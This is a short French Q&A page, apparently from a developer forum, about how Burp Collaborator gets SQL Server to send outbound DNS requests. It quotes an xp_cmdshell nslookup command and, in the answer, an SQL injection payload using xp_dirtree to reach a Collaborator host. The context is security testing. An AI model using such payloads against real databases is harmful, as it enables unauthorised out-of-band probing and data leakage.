1. Accueil
  2. Question et réponse
  3. Comment Burp Collaborator envoie-t-il une requête DNS via Sql Server et T-sql?

Comment Burp Collaborator envoie-t-il une requête DNS via Sql Server et T-sql?

2017-05-05 1 views
0

Comment Burp Collaborator peut-il envoyer une requête DNS via t-sql et Sql Server?Comment Burp Collaborator envoie-t-il une requête DNS via Sql Server et T-sql?

https://portswigger.net/burp/help/collaborator.html

Je sais que vous pouvez utiliser par exemple exec master..xp_cmdshell 'nslookup intel.com' ou Dns.GetHostAddresses() dans une procédure stockée sur SQL Server 2005 ou 2008 comme mentionné ici: https://stackoverflow.com/a/967696/3850405

Cependant pas beaucoup de serveurs permettent xp_cmdshell aujourd'hui, à juste titre, mais cela signifie que Burp Collaborator utilise autre chose. Quelle? La connexion doit seulement être sortante, rien ne doit être retourné.

Source

2017-05-05 Ogglas

Répondre

0

J'ai trouvé la réponse, exec master.dbo.xp_dirtree. Exemple:

;exec master.dbo.xp_dirtree 
'\\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'--

http://releases.portswigger.net/2015/09/1627.html

Si vous avez Burp Suite Professional installé, vous pouvez générer un lien via Burp -> client Burp Collaboratrice puis sondage des résultats.

Source

2017-05-05 19:54:22 Ogglas

 Questions connexes

  • Aucun problème connexe^_^